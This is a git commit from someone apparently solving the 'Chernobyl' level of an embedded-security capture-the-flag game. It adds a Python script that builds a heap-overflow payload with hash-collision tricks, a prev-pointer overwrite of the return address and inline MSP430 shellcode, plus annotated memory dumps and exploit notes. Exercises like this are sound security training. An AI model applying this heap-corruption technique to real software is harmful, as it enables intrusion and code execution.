Solve Chernobyl

This commit is contained in:
Val 2022-09-02 06:24:41 -05:00
parent 31df36d848
commit f63718bc9b
3 changed files with 75 additions and 17 deletions

View File

@ -0,0 +1,53 @@
#!/usr/bin/env python3
# user info
user_struct_size = 0x12 # User is a tuple of (char[16], i16)
users_per_box = 0x5
# Stack info
ret_stack_addr = 0x3dce - 0x0004 # 3nd index of header struct
ret_addr = 0x49a2 # Address that will be returned to
stackbuffer_top = 0x3df0 - 0x0006 # top of stack buffer, PLUS "new "
target_offset = ((stackbuffer_top - ret_addr) & 0xffff) + 1
print(f"{ret_stack_addr = :x}, {ret_addr = :x}, {target_offset = :x}");
bnew = b'new '
clobber = ret_stack_addr.to_bytes(2, 'little').hex() + 'fc50' + target_offset.to_bytes(2, 'little').hex()
'''
sub.b #1, r8 5883
swpb r8 8810
mov r8, sr 0248
mov #4cfc, pc 3040 fc4c
'''
payload = "5883 8810 0248 3040fc4c"
# Hash function, which governs the boxes
def hash(byts: bytes):
ret = 0;
for c in byts:
ret += c
ret = ((ret << 5) - ret) & 0xffff
return ret
# Fix a string by adding a character that causes a hash collision
def fixhash(name:bytes, box:int, modulus:int):
error = box - (hash(name) % modulus)
if error % modulus == 0:
return name
name += (ord("@")+error+modulus).to_bytes(1, "big")
print(f"{name.hex() = }; {error = }; new box = {hash(name) % modulus}")
return name
def a2h (s: str):
return bytes(s, 'ascii').hex()
payload = f'{a2h("new ")} {fixhash(bytes.fromhex(payload), 0, 16).hex()} {a2h(" ;new 8 ;new @ ;new H ;new P ;")} {bnew.hex()} {fixhash(bytes.fromhex(clobber), 0, 16).hex()} {a2h(" ;new 1 ;new 9 ;new A ;new I ;new Q ;new")}'
print(payload)
exit(0)
while 1:
name, box = input("> ").split()
print(fixhash(bytes(name, "ascii"), int(box), 16).decode('ascii'));

View File

@ -1,23 +1,23 @@
Hash Table, plus one full box: Hash Table, plus one full box:
0 1 2 3 4 5 6 7 8 9 a b c d e f
5000: 0050 1050 1500 0b00 0300 0500 1650 2c50 .P.P.........P,P 5000:[0050 1050 1500]0b00 0300 0500 1650 2c50 .P.P.........P,P
5010: 0050 2650 2100 4250 a250 0251 6251 c251 .P&P!.BP.P.QbQ.Q 5010:[0050 2650 2100]4250 a250 0251 6251 c251 .P&P!.BP.P.QbQ.Q
5020: 2252 8252 e252 1050 3c50 2100 0b00 0000 "R.R.R.P<P!..... 5020: 2252 8252 e252[1050 3c50 2100]0b00 0000 "R.R.R.P<P!.....
5030: 0000 0000 0000 0000 0000 0000 2650 9c50 ............&P.P 5030: 0000 0000 0000 0000 0000 0000[2650 9c50 ............&P.P
5040: b500 4141 4141 4141 4141 4141 4141 4141 ..AAAAAAAAAAAAAA 5040: b500]4141 4141 4141 4141 4141 4141 4141 ..AAAAAAAAAAAAAA
5050: 4100 e004 4141 4141 4141 4141 4141 4141 A...AAAAAAAAAAAA 5050: 4100 e004 4141 4141 4141 4141 4141 4141 A...AAAAAAAAAAAA
5060: 4141 4100 e004 4141 4141 4141 4141 4141 AAA...AAAAAAAAAA 5060: 4141 4100 e004 4141 4141 4141 4141 4141 AAA...AAAAAAAAAA
5070: 4141 4141 4100 e004 4141 4141 4141 4141 AAAAA...AAAAAAAA 5070: 4141 4141 4100 e004 4141 4141 4141 4141 AAAAA...AAAAAAAA
5080: 4141 4141 4141 4100 e004 4141 4141 4141 AAAAAAA...AAAAAA 5080: 4141 4141 4141 4100 e004 4141 4141 4141 AAAAAAA...AAAAAA
5090: 4141 4141 4141 4141 4100 e004 4141 4141 AAAAAAAAA...AAAA ; wait a second 5090: 4141 4141 4141 4141 4100 e004[4141 4141 AAAAAAAAA...AAAA ; wait a second
50a0: 4141 4141 4141 4141 4141 4100 e004 4141 AAAAAAAAAAA...AA 50a0: 4141]4141 4141 4141 4141 4100 e004 4141 AAAAAAAAAAA...AA
50b0: 4141 4141 4141 4141 4141 4141 4100 e004 AAAAAAAAAAAAA... 50b0: 4141 4141 4141 4141 4141 4141 4100 e004 AAAAAAAAAAAAA...
50c0: 4141 4141 4141 4141 4141 4141 4141 4100 AAAAAAAAAAAAAAA. 50c0: 4141 4141 4141 4141 4141 4141 4141 4100 AAAAAAAAAAAAAAA.
50d0: e004 4141 4141 4141 4141 4141 4141 4141 ..AAAAAAAAAAAAAA 50d0: e004 4141 4141 4141 4141 4141 4141 4141 ..AAAAAAAAAAAAAA
50e0: 4100 e004 4141 4141 4141 4141 4141 4141 A...AAAAAAAAAAAA 50e0: 4100 e004 4141 4141 4141 4141 4141 4141 A...AAAAAAAAAAAA
50f0: 4141 4100 e004 4141 4141 4800 9c50 5c51 AAA...AAAAH..P\Q 50f0: 4141 4100 e004 4141 4141 4800[9c50 5c51 AAA...AAAAH..P\Q
5100: b500 0000 0000 e004 0000 0000 0000 0000 ................ 5100: b500]0000 0000 e004 0000 0000 0000 0000 ................
Heap metadata @ 2400: 0050 0080 0000 Heap metadata @ 2400: 0050 0080 0000
Heap start: 0x5000 Heap start: 0x5000
@ -51,10 +51,15 @@ Section header metadata @ 5026: 1050 3c50 2100
[ Prev: 5010, Next: 503c, Size: 0010 ] [ Prev: 5010, Next: 503c, Size: 0010 ]
Data: 0a00 0000 0000 0000 0000 0000 0000 0000 Data: 0a00 0000 0000 0000 0000 0000 0000 0000
The Exploit:
When an 11th user is added, the software will attempt to double the size of the heap. Overwriting a heap Next pointer allows us toAAAA
for c in ['1', '9', 'A', 'I', 'Q', '0', '8', '@', 'H', 'P', 'AAAAAAAAAAAAAAAA', '']: for c in ['1', '9', 'A', 'I', 'Q', '0', '8', '@', 'H', 'P', 'AAAAAAAAAAAAAAAA', '']:
print(f'new {c} ;',end="") print(f'new {c} ;',end="")
Malloc:
- Checks to make sure next pointer is always ASCENDING
- Does not check prev pointer!!!!
The Exploit:
- Overwrite the prev pointer of a block so that it points to ~ the return address on stack
- Overwrite the size parameter so that, when added to the return address, it places pc somewhere nice
- Place pc into a payload on the stack
- INT 0x7f

View File

@ -29,5 +29,5 @@ Hopefully in the coming weeks I'll learn enough about malloc and free to get som
Bangalore Bangalore
### 2022 Jul 31 AM: ### 2022 Jul 31 AM:
Lagos Lagos
### 2022 Jul 31 PM - Present Day: ### 2022 Jul 31 PM - 2022 Sep 2 AM:
Chernobyl (ongoing) Chernobyl